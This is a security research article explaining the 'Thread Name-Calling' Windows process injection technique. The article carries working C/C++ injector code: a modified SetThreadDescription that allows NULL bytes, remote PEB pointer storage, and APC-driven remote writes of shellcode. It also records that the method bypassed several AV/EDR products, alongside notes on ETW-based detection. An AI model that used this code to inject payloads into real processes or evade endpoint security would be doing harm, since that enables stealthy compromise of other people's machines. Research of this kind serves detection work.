Research by: hasherezade
Process injection is one of the important techniques used by attackers. We can find its variants implemented in almost every malware. It serves purposes such as:
Because interference in the memory of a process by malicious modules can cause a lot of damage, all sorts of AV and EDR products monitor such behaviors and try to prevent them. However, this monitoring is based on knowledge of the common APIs used in implementations of the injection methods. This cat-and-mouse game never ends. Cybercriminals, as well as red teamers, keep trying to break the known patterns by using atypical APIs, and thereby evade the detection implemented at the time. Examples include the Atom Bombing technique (from 2016), which uses the Atom Table to pass the code into the remote process, and the more recent Pool Party (from 2023), where thread pools were abused to run code in the context of a different process without the EDRs noticing it. The diversity of the APIs used has been very well described in the paper “Windows Process Injection in 2019” by Amit Klein and Itzik Kotler.
Thread Name-Calling is yet another take on this topic. It is a technique that allows implanting shellcode into a running process, using the following Windows APIs:
GetThreadDescription / SetThreadDescription (introduced in Windows 10, 1607) – an API for setting and retrieving the thread description (a.k.a. thread name)
ZwQueueApcThreadEx2 (introduced in Windows 10, 19045) – a new API for Asynchronous Procedure Calls (APC)
The remote memory allocation, and writing to it, is achieved on the process using a handle without the write access (PROCESS_VM_WRITE). Thanks to this feature, and also due to the fact that the APIs we used are not commonly associated with process injection, we were able to bypass some of the major AV and EDR products. In this blog we elaborate on the implementation details of this new technique and suggest some possible detection methods.
Before we begin, note that the involved functions are relatively new, and are not used in any well-established injection methods. However, they are not “brand new” – they have been added a few years ago, so naturally we are not the first ones to research about their potential for offensive scenarios. Some of the related uses were discussed on X/Twitter (we found a question by Adam “Hexacorn” from 2020, and by Gal Yaniv from 2021 referencing those APIs). We tried to collect the various use-cases to the best of our abilities, and list the related PoCs.
Get/SetThreadDescription may be utilized in:
GetThreadDescription is called remotely on the target, via APC, causing the description buffer to be copied into the target’s working set. After making the buffer executable, it is run using another APC call. It supports any custom shellcode. This technique does not corrupt the original thread: the target application seamlessly continues its execution.
LoadLibrary to get the DLL loaded within the target. In contrast to the classic implementation that uses VirtualAllocEx and WriteProcessMemory, here the path of the DLL is passed via thread name (remote write achieved as in the Thread Name-Calling).
Let’s start by looking at the APIs that are vital for the introduced technique. Understanding the details of their implementation is crucial for explaining the further abuse.
Starting with Windows 10, version 1607, the following functions were added to the Windows API:
HRESULT GetThreadDescription( [in] HANDLE hThread, [out] PWSTR *ppszThreadDescription );
HRESULT SetThreadDescription( [in] HANDLE hThread, [in] PCWSTR lpThreadDescription );
Their expected usage is related to setting the description (name) of a thread. That makes it possible to identify the thread’s functionality, and can help, e.g., in debugging. However, if we look at this API with an offensive mindset, we can quickly see some potential for misuse.
To set the name, we need to open a handle to the thread with the access flag THREAD_SET_LIMITED_INFORMATION. Under this minimal requirement, we can attach our arbitrary buffer to any thread of a remote process.
The buffer must be a Unicode string, which basically means any buffer terminated by L'\0' (double NULL byte). The size that we can allocate is pretty generous: 0x10000 bytes – of which, according to experiments, we can use (0x10000 - 2) for our data buffer (including the terminator). This is equivalent to almost 16 pages of data, which is more than enough to store a block of shellcode…
The described functions are implemented in Kernelbase.dll.
#define ThreadNameInformation 0x26

HRESULT __stdcall SetThreadDescription(HANDLE hThread, PCWSTR lpThreadDescription)
{
    NTSTATUS status; // eax
    struct _UNICODE_STRING DestinationString;

    status = RtlInitUnicodeStringEx(&DestinationString, lpThreadDescription);
    if ( status >= 0 )
        status = NtSetInformationThread(hThread, ThreadNameInformation, &DestinationString, 0x10u);
    return status | 0x10000000;
}
This function expects us to pass a Unicode string buffer (WCHAR*), from which it creates a UNICODE_STRING structure that is passed further. Looking at the implementation, we can see that the setting of the string onto the thread is implemented by NtSetInformationThread. The returned value is a result of the aforementioned low-level API converted from NTSTATUS to HRESULT, by setting FACILITY_NT_BIT (0x10000000).
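The NTSTATUS to HRESULT conversion mentioned above is plain bit arithmetic, so it can be illustrated without any Windows headers. The following is only a sketch: the names `hresult_from_nt`, `hr_failed` and `check_conversion_examples` are ours and are not part of any SDK; only the value of FACILITY_NT_BIT comes from the text. One detail worth noticing is that a successful status (0) becomes 0x10000000 rather than 0, which still counts as success because the top bit is clear.

```cpp
#include <cassert>
#include <cstdint>

// Value of FACILITY_NT_BIT, as quoted in the text above.
constexpr std::uint32_t kFacilityNtBit = 0x10000000u;

// Illustrative helper (our own name): wrap an NTSTATUS into an HRESULT by
// OR-ing in FACILITY_NT_BIT, as the decompiled code does.
constexpr std::uint32_t hresult_from_nt(std::uint32_t ntstatus) {
    return ntstatus | kFacilityNtBit;
}

// Illustrative helper: an HRESULT signals failure when its top bit is set.
constexpr bool hr_failed(std::uint32_t hr) {
    return (hr & 0x80000000u) != 0;
}

// Quick self-check of a success status and a failure status.
inline void check_conversion_examples() {
    assert(hresult_from_nt(0x00000000u) == 0x10000000u);  // STATUS_SUCCESS
    assert(hresult_from_nt(0xC000000Du) == 0xD000000Du);  // STATUS_INVALID_PARAMETER
    assert(!hr_failed(hresult_from_nt(0x00000000u)));
    assert(hr_failed(hresult_from_nt(0xC000000Du)));
}
```

A caller that compares the returned HRESULT against 0 would therefore misread a success; checking the sign bit, as `hr_failed` does, is the safer test.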
In our implementation of a remote write, we start by calling SetThreadDescription on a remote thread, making it hold our buffer.
HRESULT __stdcall GetThreadDescription(HANDLE hThread, PWSTR *ppszThreadDescription)
{
    SIZE_T struct_len; // rbx
    SIZE_T struct_size; // r8
    NTSTATUS res; // eax
    NTSTATUS status; // ebx
    const UNICODE_STRING *struct_buf; // rdi
    ULONG ReturnLength; // [rsp+58h] [rbp+10h] BYREF

    *ppszThreadDescription = nullptr;
    LODWORD(struct_len) = 144;
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0);
    for ( struct_size = 146; ; struct_size = struct_len + 2 )
    {
        struct_buf = (const UNICODE_STRING *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, struct_size);
        if ( !struct_buf )
        {
            status = 0xC0000017;
            goto finish;
        }
        res = NtQueryInformationThread(
            hThread,
            ThreadNameInformation,
            (PVOID)struct_buf,
            struct_len,
            &ReturnLength);
        status = res;
        if ( res != 0xC0000004 && res != 0xC0000023 && res != 0x80000005 )
            break;
        struct_len = ReturnLength;
        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
    }
    if ( res >= 0 )
    {
        ReturnLength = struct_buf->Length;
        // move the buffer to the beginning of the structure
        memmove_0((void *)struct_buf, struct_buf->Buffer, ReturnLength);
        // null terminate the buffer
        *(&struct_buf->Length + ((unsigned __int64)ReturnLength >> 1)) = 0;
        // fill in the passed pointer
        *ppszThreadDescription = &struct_buf->Length;
        struct_buf = 0i64;
    }
finish:
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
    return status | 0x10000000;
}
Analyzing this function reveals some other interesting implementation details. The buffer for the thread name that we want to retrieve is allocated on a heap within the retrieving process. The function automatically allocates a size that can fit the relevant UNICODE_STRING. It then erases the initial fields of the structure (Length and MaximumLength), and moves the buffer content towards the beginning of the structure, transforming it into a simple, null-terminated wide string. Next, the pointer to this new buffer is filled into the variable passed by the caller.
If we call GetThreadDescription remotely, in the context of the target process, we gain a remote allocation of a buffer on the heap, and that buffer also gets filled with our content.
Looking at the implementation, we can notice that a buffer that we retrieve via GetThreadDescription is just a local copy. Now the question is: where is the original UNICODE_STRING, associated with the thread, stored? To learn more we need to look into the Windows kernel (ntoskrnl.exe), at the implementation of the syscalls that set/read it (NtSetInformationThread and NtQueryInformationThread).
It turns out this buffer is stored in Kernel Mode, represented by the field ETHREAD → ThreadName.
lkd> dt nt!_ETHREAD
[...]
   +0x610 ThreadName : Ptr64 _UNICODE_STRING
[...]
Fragment of NtSetInformationThread responsible for setting the thread name (in Kernel Mode):
[...]
    Length = Src.Length;
    if ( (Src.Length & 1) != 0 || Src.Length > Src.MaximumLength )
    {
      status = 0xC000000D; // STATUS_INVALID_PARAMETER -> invalid buffer size supplied
    }
    else
    {
      PoolWithTag = ExAllocatePoolWithTag(NonPagedPoolNx, Src.Length + 16i64, 'mNhT'); // allocating a buffer on non paged pool, with tag 'ThNm'
      threadName = PoolWithTag;
      v113 = PoolWithTag;
      if ( PoolWithTag )
      {
        p_Length = &PoolWithTag[1].Length;
        threadName->Buffer = p_Length;
        threadName->Length = Length;
        threadName->MaximumLength = Length;
        memmove(p_Length, Src.Buffer, Length);
        eThread = Object;
        PspLockThreadSecurityExclusive(Object, CurrentThread);
        v105 = 1;
        P = eThread->ThreadName;
        eThread->ThreadName = threadName;
        threadName = 0i64;
        v113 = 0i64;
        EtwTraceThreadSetName(eThread);
        goto finish;
      }
      status = 0xC000009A;
    }
  }
  else
  {
    status = 0xC0000004;
  }
  v104 = status;
finish:
[...]
As we can see, the buffer is allocated on NonPagedPoolNx (non-executable non-paged pool). The allocated buffer is filled with the UNICODE_STRING, and its pointer is stored in ThreadName within the ETHREAD structure of a particular thread.
The event of setting the ThreadName is registered by ETW (Event Tracing for Windows), which can be further used to detect this injection method. The generated event collects data such as ProcessID and ThreadID, which are required to identify the thread and the ThreadName that was set.
__int64 __fastcall EtwTraceThreadSetName(_ETHREAD *thread)
{
  int v1; // r10d
  _UNICODE_STRING *ThreadName; // rax
  __int64 *Buffer; // rcx
  unsigned int Length; // edx
  unsigned __int64 len; // rax
  int v7[4]; // [rsp+30h] [rbp-50h] BYREF
  __int64 v8[2]; // [rsp+40h] [rbp-40h] BYREF
  __int64 *buf; // [rsp+50h] [rbp-30h]
  __int64 v10; // [rsp+58h] [rbp-28h]
  __int64 *v11; // [rsp+60h] [rbp-20h]
  __int64 v12; // [rsp+68h] [rbp-18h]

  v7[0] = thread->Cid.UniqueProcess;
  v1 = 2;
  v7[1] = thread->Cid.UniqueThread;
  v8[0] = v7;
  ThreadName = thread->ThreadName;
  v7[2] = 0;
  v8[1] = 8i64;
  if ( ThreadName && (Buffer = ThreadName->Buffer) != 0i64 )
  {
    Length = ThreadName->Length;
    len = 0x800i64;
    if ( Length < 0x800u )
      len = Length;
    buf = Buffer;
    v10 = len;
    if ( !len || *(Buffer + (len >> 1) - 1) )
    {
      v12 = 2i64;
      v11 = &EtwpNull;
      v1 = 3;
    }
  }
  else
  {
    v10 = 2i64;
    buf = &EtwpNull;
  }
  return EtwTraceKernelEvent(v8, v1, 2, 1352, 0x501802);
}
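From the defender's side, the thread name carried by such an event can be inspected for signs that it is not a human-readable label. The sketch below is a hypothetical heuristic, not something taken from the research: the function name `looks_like_binary_thread_name` and both thresholds are our own assumptions, and it works on raw UTF-16LE bytes however a consumer obtained them. It flags names that are unusually long or that consist mostly of characters outside printable ASCII. Legitimate names in non-Latin scripts would be flagged too, so this could only ever be one signal among several.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical thresholds, chosen only for illustration.
constexpr std::size_t kMaxPlausibleNameBytes = 256;
constexpr double kMinPrintableRatio = 0.9;

// Returns true when a captured thread name (raw UTF-16LE bytes) looks
// unlike a human-readable label.
bool looks_like_binary_thread_name(const std::uint8_t* name, std::size_t size_bytes) {
    assert(name != nullptr || size_bytes == 0);
    const std::size_t units = size_bytes / 2;  // number of complete WCHARs
    if (units == 0) {
        return false;  // an empty name is not interesting
    }
    if (size_bytes > kMaxPlausibleNameBytes) {
        return true;   // far longer than a typical descriptive name
    }
    std::size_t printable = 0;
    for (std::size_t i = 0; i < units; ++i) {
        // Assemble one little-endian UTF-16 code unit from two bytes.
        const std::uint16_t ch =
            static_cast<std::uint16_t>(name[2 * i] | (name[2 * i + 1] << 8));
        if (ch >= 0x20 && ch <= 0x7E) {
            ++printable;  // printable ASCII
        }
    }
    return static_cast<double>(printable) / static_cast<double>(units) < kMinPrintableRatio;
}
```

Keep in mind that, according to the decompiled routine above, the event carries at most 0x800 bytes of the name, so a consumer of the event sees only a prefix of a larger buffer.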
Setting the thread name via the official API imposes some limitations on the buffer. It has to be a valid Unicode string, which means that an empty WCHAR will be used as a buffer terminator. The size of WCHAR is two bytes, so if our shellcode contains any double NULL byte, only the part before it will be copied. This is a common limitation encountered whenever shellcode is to be passed via a buffer dedicated to holding strings. To solve this issue, shellcode encoders have been invented: they convert a buffer into a format that is free from NULL bytes. We can use one of them in our case as well.
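To make the truncation concrete, here is a portable sketch of how a wide-string API measures its input. The helper name `bytes_before_wide_terminator` is ours, and the code only models the length calculation; it calls no Windows function. A terminator is a whole zero WCHAR, meaning two zero bytes starting at an even offset, so a pair of zero bytes that straddles two WCHARs does not end the string.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Illustrative helper (hypothetical name): number of bytes a wide-string
// API would treat as the string, i.e. everything before the first zero
// WCHAR (two zero bytes at an even offset).
std::size_t bytes_before_wide_terminator(const std::uint8_t* data, std::size_t size) {
    assert(data != nullptr || size == 0);
    for (std::size_t i = 0; i + 1 < size; i += 2) {
        if (data[i] == 0 && data[i + 1] == 0) {
            return i;  // terminator found at WCHAR index i / 2
        }
    }
    return size - (size % 2);  // no terminator: every complete WCHAR counts
}
```

For the bytes `90 90 00 00 CC CC` the function returns 2, because the second WCHAR is zero and everything after it would be dropped. For `90 00 00 90 CC CC` it returns 6: the two zero bytes belong to different WCHARs, so nothing is cut off.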
However, by analyzing the implementation of the above API, we realized that it is actually possible to avoid this limitation at its root. When the thread name is copied between different buffers, the declared length from the UNICODE_STRING structure is used, along with the memmove function, which does not treat NULL bytes as terminators. The only function that imposes the NULL byte constraint is SetThreadDescription. Underneath, it calls RtlInitUnicodeStringEx, which takes the passed WCHAR buffer and uses it to initialize the UNICODE_STRING structure. The input buffer must be NULL-terminated, and the length to be saved in the structure is determined based on the position of this character.
We can create an easy workaround for our problem, by using a custom implementation of SetThreadDescription:
HRESULT mySetThreadDescription(HANDLE hThread, const BYTE* buf, size_t buf_size)
{
    UNICODE_STRING DestinationString = { 0 };
    BYTE* padding = (BYTE*)::calloc(buf_size + sizeof(WCHAR), 1);
    ::memset(padding, 'A', buf_size);

    auto pRtlInitUnicodeStringEx = reinterpret_cast<decltype(&RtlInitUnicodeStringEx)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeStringEx"));
    pRtlInitUnicodeStringEx(&DestinationString, (PCWSTR)padding);
    // fill with our real content:
    ::memcpy(DestinationString.Buffer, buf, buf_size);

    auto pNtSetInformationThread = reinterpret_cast<decltype(&NtSetInformationThread)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationThread"));
    NTSTATUS status = pNtSetInformationThread(hThread, (THREADINFOCLASS)(ThreadNameInformation), &DestinationString, 0x10u);
    ::free(padding);
    return HRESULT_FROM_NT(status);
}
This function initializes UNICODE_STRING based on a dummy buffer of the required length, and then fills it with the actual content (which may contain NULL bytes). Then, the prepared structure is passed to the thread using the low-level API: NtSetInformationThread.
In the implementation of our injection technique, we rely on calling some APIs remotely within the target process.
Windows supports adding routines to the Asynchronous Procedure Call (APC) queue of existing threads, giving the ability to run code in a remote process without the need to create an additional thread. At a low level, this functionality is exposed by the function NtQueueApcThreadEx (and its wrapper: NtQueueApcThread). The official, higher-level API recommended by Microsoft is QueueUserAPC – which works as a wrapper for the lower-level function. We are free to add APC to a remote thread, as long as its handle is opened with THREAD_SET_CONTEXT access.
The related APIs have often been misused in a variety of different (old and new) injection techniques, and are described in the MITRE database. APC allows for running remote code by hopping onboard an existing thread, which is stealthier than the common alternative of creating a remote thread. Creating a new thread triggers a kernel callback (PsSetCreateThreadNotifyRoutine / Ex), often used by kernel-mode components of AV / EDR products for detection.
In addition, APC gives us more freedom in passing parameters to the remote function. In case of a new thread creation, we can pass only one argument – and here we are allowed to use 3.
However, using the plain NtQueueApcThread has a drawback. To add our function to the APC queue, we first need to find a thread that is in an alertable state (waiting for a signal). Our callback is executed only when the thread is alerted. Details on how to approach this obstacle are explained, e.g., in the blog post by modexp. Relying on alertable threads limits our choices for the targets, and scanning for them adds some complexity to the injector.
Fortunately, a workaround to this problem appeared since the new types of APC callbacks have been introduced on Windows. They are defined by QUEUE_USER_APC_FLAGS. Since the introduction of this type, the argument ReserveHandle in NtQueueApcThreadEx was replaced with UserApcOption, where we can pass such a flag, modifying the function’s behavior. The most interesting from our perspective is Special User APC (QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC), which allows us to inject into threads that are not necessarily in the alertable state:
Quote from MSDN:
Special user-mode APCs always execute, even if the target thread is not in an alertable state. For example, if the target thread is currently executing user-mode code, or if the target thread is currently performing an alertable wait, the target thread will be interrupted immediately for APC execution. If the target thread is executing a system call, or performing a non-alertable wait, the APC will be executed after the system call or non-alertable wait finishes (the wait is not interrupted).
Note that the potential of the new API for improving injection methods was already noticed by researchers, and is described, e.g., in this blog by repnz.
This new APC type has also been criticized for the associated risk of introducing stability issues in the application and making it harder to synchronize the threads (e.g. here). However, it should not be a big problem in our case, as we are using it to run code that is completely independent from the running application and does not use any resources that could create concurrency issues.
The new API supporting the added APC types was officially added in Windows 11 (Build 22000). It is exposed by the function QueueUserAPC2, which, at the lower level, was implemented by a new version of the well-known NtQueueApcThreadEx. The new function is simply called NtQueueApcThreadEx2 and has the following prototype (source):
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueueApcThreadEx2(
    _In_ HANDLE ThreadHandle,
    _In_opt_ HANDLE ReserveHandle, // NtAllocateReserveObject
    _In_ ULONG ApcFlags, // QUEUE_USER_APC_FLAGS
    _In_ PPS_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcArgument1,
    _In_opt_ PVOID ApcArgument2,
    _In_opt_ PVOID ApcArgument3
    );
It turns out we can find this API on Windows 10, since build 19045 – which is earlier than the officially supported version.
As this is a relatively new API, associated with a new syscall, using it can also give an opportunity to bypass some of the products that are not yet watching it.
We use this API for a remote function execution in our implementation of Thread Name-Calling. Still, it is possible to implement a (less stealthy) variant of Thread Name-Calling, using the old API, which we will also demonstrate.
This function is not a requirement for our technique, but rather a helper that makes the shellcode execution a bit more stealthy.
Once the shellcode is successfully copied into the remote process, we need to run it. We decided to do it by adding its start address to the APC queue of the remote thread. However, since our shellcode is in private memory rather than in any mapped module, passing its address directly may trigger some alerts. To evade this indicator it is beneficial to use some legitimate function as a proxy. There are multiple functions that allow passing a callback to be executed. Many of them have been documented extensively by Hexacorn in his blog. Some interesting additions have been noted on the modexp blog.
The function RtlDispatchAPC looks like a perfect candidate. It has three arguments, so it is compatible with the APC API. The implementation:
void __fastcall RtlDispatchAPC(void (__fastcall *callback)(__int64), __int64 callback_arg, void *a3)
{
  __int64 v6 = 72LL;
  int v7 = 1;
  __int128 v8 = 0LL;
  __int128 v9 = 0LL;
  __int128 v10 = 0LL;
  __int64 v11 = 0LL;

  if ( a3 == (void *)-1LL )
  {
    callback(callback_arg);
  }
  else
  {
    RtlActivateActivationContextUnsafeFast(&v6, a3);
    callback(callback_arg);
    RtlDeactivateActivationContextUnsafeFast(&v6);
    RtlReleaseActivationContext(a3);
  }
}
To make the above function execute our shellcode we need to pass it the following parameters:
RtlDispatchAPC(shellcodePtr, 0, (void *)(-1))
Note that RtlDispatchAPC is not exported by name, but, on the tested versions of Windows, we could find it easily by Ordinal 8.
Now that we have introduced all the important APIs, let’s dive into the implementation details of Thread Name-Calling. As already mentioned, it is a variant of a technique that allows us to inject a shellcode into a running process (in contrast to the techniques that operate on the process that needs to be freshly created).
Typically, when we want to write a buffer into a process, we need to first open a handle to this process with a write access right (PROCESS_VM_WRITE) – which may be treated as a suspicious indicator. Thread Name-Calling allows us to achieve the write, and remote allocation, without it.
The currently presented implementation requires opening the process handle with the following access rights:
HANDLE open_process(DWORD processId, bool isCreateThread)
{
    DWORD access = PROCESS_QUERY_LIMITED_INFORMATION // required for reading the PEB address
        | PROCESS_VM_READ // required for reading back the pointer to the created buffer
        | PROCESS_VM_OPERATION // to set memory area executable or/and allocate a new executable memory
        ;
    if (isCreateThread) {
        access |= PROCESS_CREATE_THREAD; // to create a new thread where we can pass APC
    }
    return OpenProcess(access, FALSE, processId);
}
Depending on our needs, Thread Name-Calling can be implemented in different flavors. In the most stealthy (recommended) variant, we do the remote calls using routines added to the APC queue of an existing thread. However, if we want to run it on older versions of Windows, where the new API for APC is not available, and we can’t find alertable threads in our desired target, we may create an additional thread. In such case, the relevant access right needs to be set on our process handle:
PROCESS_CREATE_THREAD
Keep in mind that this change increases the detection ratio of the technique. However, we found some products where it was enough for the bypass.
Generally, it is a good practice to minimize the used access rights. Of the ones listed above, we can still avoid using some of them by further refining the implementation. For example:
PROCESS_QUERY_LIMITED_INFORMATION – can be avoided if we don’t use PEB for the pointer storage (details explained later)
During the injection, we operate on threads of our target process. Regarding the thread handle, these are the minimal required access rights:
DWORD thAccess = SYNCHRONIZE;
thAccess |= THREAD_SET_CONTEXT; // required for adding to the APC queue
thAccess |= THREAD_SET_LIMITED_INFORMATION; // required for setting thread description
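Seen from the monitoring side, the combination of access rights listed above is itself a pattern that can be checked. The following is a rough sketch under our own assumptions: the function `matches_name_calling_profile` and the idea of pairing one process mask with one thread mask are hypothetical and not part of the research, while the numeric values are those defined in the Windows SDK header winnt.h. The point it illustrates is that a rule keyed only on PROCESS_VM_WRITE would not fire for this set of rights.

```cpp
#include <cassert>
#include <cstdint>

// Access-right values as defined in the Windows SDK (winnt.h).
constexpr std::uint32_t kProcessVmOperation = 0x0008;
constexpr std::uint32_t kProcessVmRead = 0x0010;
constexpr std::uint32_t kProcessVmWrite = 0x0020;
constexpr std::uint32_t kThreadSetContext = 0x0010;
constexpr std::uint32_t kThreadSetLimitedInformation = 0x0400;

// True when every bit in `bits` is present in `mask`.
constexpr bool has_all(std::uint32_t mask, std::uint32_t bits) {
    return (mask & bits) == bits;
}

// Hypothetical heuristic: the process handle can read and change memory
// protection but cannot write, while the thread handle can both queue
// APCs and set the thread description.
constexpr bool matches_name_calling_profile(std::uint32_t process_access,
                                            std::uint32_t thread_access) {
    return has_all(process_access, kProcessVmOperation | kProcessVmRead)
        && !has_all(process_access, kProcessVmWrite)
        && has_all(thread_access, kThreadSetContext | kThreadSetLimitedInformation);
}

// Quick self-check with the masks used in the snippets above.
inline void check_profile_examples() {
    assert(matches_name_calling_profile(0x1018u, 0x100410u));   // rights from the text
    assert(!matches_name_calling_profile(0x1038u, 0x100410u));  // PROCESS_VM_WRITE present
}
```

Such a match is far from conclusive on its own, since debuggers and diagnostic tools may request similar rights, so in practice it would need to be correlated with other events.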
As is always the case with remote shellcode injection, the implementation must cover:
Let’s have a look at the details of how the remote allocation, along with remote writing, can be implemented with the help of the APIs mentioned earlier.
HRESULT GetThreadDescription(
    [in] HANDLE hThread,
    [out] PWSTR *ppszThreadDescription // <- we get back the pointer to allocated buffer
);
Remember that the above function automatically allocates a buffer of a required size on the heap, and then fills it in with the thread description. This gives us the remote write primitive together with remote allocation of a buffer with Read/Write access. The pointer to this new buffer will be filled into the supplied variable ppszThreadDescription.
Therefore, we need to prepare in advance a memory address within the remote process that can be used as *ppszThreadDescription. It must be an area of a pointer size where the called function GetThreadDescription can write back. There are various options to approach it:
We decided to utilize an unused field in a PEB because it is very easy to find and retrieve, but we can later replace it with a cave if needed.
By checking fields in the PEB we can find the following:
[...]
    PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex)
    PVOID PatchLoaderData;
    PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO

    ULONG AppModelFeatureState;
    ULONG SpareUlongs[2]; // ---> unused field, can be utilized to store our pointer

    USHORT ActiveCodePage;
    USHORT OemCodePage;
    USHORT UseCaseMapping;
    USHORT UnusedNlsField;

    PVOID WerRegistrationData;
    PVOID WerShipAssertPtr;

    union
    {
        PVOID pContextData; // WIN7
        PVOID pUnused; // WIN10
        PVOID EcCodeBitMap; // WIN11
    };
[...]
The field SpareUlongs looks like a good candidate. We can retrieve its exact offset by dumping the PEB with WinDbg:
lkd> dt nt!_PEB
[...]
   +0x340 SpareUlongs : [5] Uint4B
[...]
PEB has read/write access, so by finding an unused field of a pointer size, we have suitable storage where the remotely called function can write back. Keep in mind that in future versions of Windows those fields may be utilized for some system data structures, so this solution must be adjusted to follow such updates.
First, we retrieve the address of the remote PEB – we can do it by calling the API NtQueryInformationProcess:
// the function getting the remote PEB address:
ULONG_PTR remote_peb_addr(IN HANDLE hProcess)
{
    PROCESS_BASIC_INFORMATION pi = { 0 };
    DWORD ReturnLength = 0;

    auto pNtQueryInformationProcess = reinterpret_cast<decltype(&NtQueryInformationProcess)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess"));
    if (!pNtQueryInformationProcess) {
        return NULL;
    }
    NTSTATUS status = pNtQueryInformationProcess(
        hProcess,
        ProcessBasicInformation,
        &pi,
        sizeof(PROCESS_BASIC_INFORMATION),
        &ReturnLength
    );
    if (status != STATUS_SUCCESS) {
        std::cerr << "NtQueryInformationProcess failed" << std::endl;
        return NULL;
    }
    return (ULONG_PTR)pi.PebBaseAddress;
}
Having the base address of the PEB, it is enough to add the known offset of the unused field, to get its pointer in the context of the remote process:
ULONG_PTR get_peb_unused(HANDLE hProcess)
{
    ULONG_PTR peb_addr = remote_peb_addr(hProcess);
    if (!peb_addr) {
        std::cerr << "Cannot retrieve PEB address!\n";
        return NULL;
    }
    const ULONG_PTR UNUSED_OFFSET = 0x340;
    const ULONG_PTR remotePtr = peb_addr + UNUSED_OFFSET;
    return remotePtr;
}
As for setting the thread description (a.k.a. name) – we can do it either:
The name will be retrieved by passing an APC with the function GetThreadDescription to the same thread where it was set (since this function has 2 parameters, and calling via APC we can pass up to 3 parameters, it is a good fit).
Side note:
The function GetThreadDescription requires us to pass the handle to the thread whose description (name) we want to read. We CAN set the name on a different thread than the one reading it back. But keep in mind that this function will be executed in the context of the target process. Therefore, the handle to the thread that we opened in the context of the injector process is no longer valid. Using it in the context of a different process would require us to duplicate the handle of the named thread. That means we must extend our access to the target process by setting PROCESS_DUP_HANDLE, so it’s best to avoid it. The alternative scenario is much easier: because we retrieve the name by the named thread itself, it is enough to use the pseudo handle NtCurrentThread() = (-2), which is always valid when a thread refers to itself.
In the first (preferable) scenario, if we utilize the threads already running within the process, we should either:
QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
The thread must be opened with (at least) THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION access.
In the second scenario, with a newly created thread, if we use it in conjunction with the old API, we also have to ensure that the thread is alertable, so that our APC gets executed. Examples on how to do it:
Sleep, ExitThread from kernel32), add the needed function to the APC queue, then resume it
SleepEx function. This function requires two arguments, the second one defining if the Sleep is alertable. Using the thread creation function we can pass only one argument – this sounds like a problem. Yet, the second needed argument is boolean, which means any non-zero value is treated as TRUE. In the x64 calling convention the second argument is passed via the RDX register, so if the RDX register, at the point of calling, holds anything different than zero, our SleepEx will be treated as alertable. That means that, with a high probability, the needed value is already set.
Any other steps can be done only after our APC gets called. Before that, we don’t have our buffer in the remote process yet, and we also don’t know at what address it would be stored. Therefore, in order to pass the buffer, we need the first APC. And after it is completed and the buffer is written, we need the second APC to be able to run it.
wchar_t* pass_via_thread_name(HANDLE hProcess, const wchar_t* buf, const void* remotePtr)
{
    if (!remotePtr) {
        std::cerr << "Return pointer not set!\n";
        return nullptr;
    }
    HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION);
    if (!hThread || hThread == INVALID_HANDLE_VALUE) {
        std::cerr << "Invalid thread handle!\n";
        return nullptr;
    }
    HRESULT hr = mySetThreadDescription(hThread, buf); // customized SetThreadDescription allows to pass a buffer with NULL bytes
    if (FAILED(hr)) {
        std::cout << "Failed to set thread desc" << std::endl;
        return nullptr;
    }
    if (!queue_apc_thread(hThread, GetThreadDescription, (void*)NtCurrentThread(), (void*)remotePtr, 0)) {
        CloseHandle(hThread);
        return nullptr;
    }
    // close thread handle
    CloseHandle(hThread);

    wchar_t* wPtr = nullptr;
    bool isRead = false;
    while ((wPtr = (wchar_t*)read_remote_ptr(hProcess, remotePtr, isRead)) == nullptr) {
        if (!isRead) return nullptr;
        Sleep(1000); // waiting for the pointer to be written;
    }
    std::cout << "Written to the Thread\n";
    return wPtr;
}
After the above function finishes, we have our buffer written to the remote process. We also have a pointer to it. That means, the remote write is accomplished.
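One detail of the function above is that its polling loop keeps waiting as long as the remote reads succeed, so it will not return if the APC is never delivered. A bounded variant could look roughly like the sketch below. It is platform-neutral on purpose: `PtrReader` and `wait_for_pointer` are hypothetical names, and the reader callback merely stands in for `read_remote_ptr`.

```cpp
#include <chrono>
#include <functional>
#include <thread>

// Hypothetical reader: returns the value found at the return address (nullptr
// while nothing has been written yet) and sets `isRead` to false when the
// read itself failed.
using PtrReader = std::function<void*(bool& isRead)>;

// Polls `reader` until it yields a non-null pointer, the read fails, or
// `maxAttempts` polls have been made. Returns nullptr on failure or timeout.
inline void* wait_for_pointer(const PtrReader& reader, unsigned maxAttempts,
                              std::chrono::milliseconds delay) {
    for (unsigned attempt = 0; attempt < maxAttempts; ++attempt) {
        bool isRead = false;
        if (void* ptr = reader(isRead)) return ptr;  // the pointer has been written
        if (!isRead) return nullptr;                 // the read itself failed
        std::this_thread::sleep_for(delay);          // not written yet, retry
    }
    return nullptr;  // gave up: the APC was probably never delivered
}
```

With a limit in place, the caller can tell "no thread ever entered an alertable state" apart from "the read failed" by how quickly the function returns, and can fall back to another thread.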
At this point our payload is already stored in the working set of the remote process. However, it is in non-executable memory, allocated on the heap.
To proceed, we need to do one of these:
Copying our buffer from the heap into a different memory region can be achieved via APC, by calling the function RtlMoveMemory from ntdll, which has 3 arguments. However, obtaining the executable buffer is more problematic.
None of the proposed solutions is perfect, but they may be sufficient depending on the scenario.
Allocating a new buffer is the cleanest option, but it has some drawbacks. To do it from a remote process, we must call VirtualAllocEx with RWX access, which is suspicious. Calling VirtualAlloc remotely via APC is impossible: this function has 4 arguments, and with the API for APC we can only pass 3.
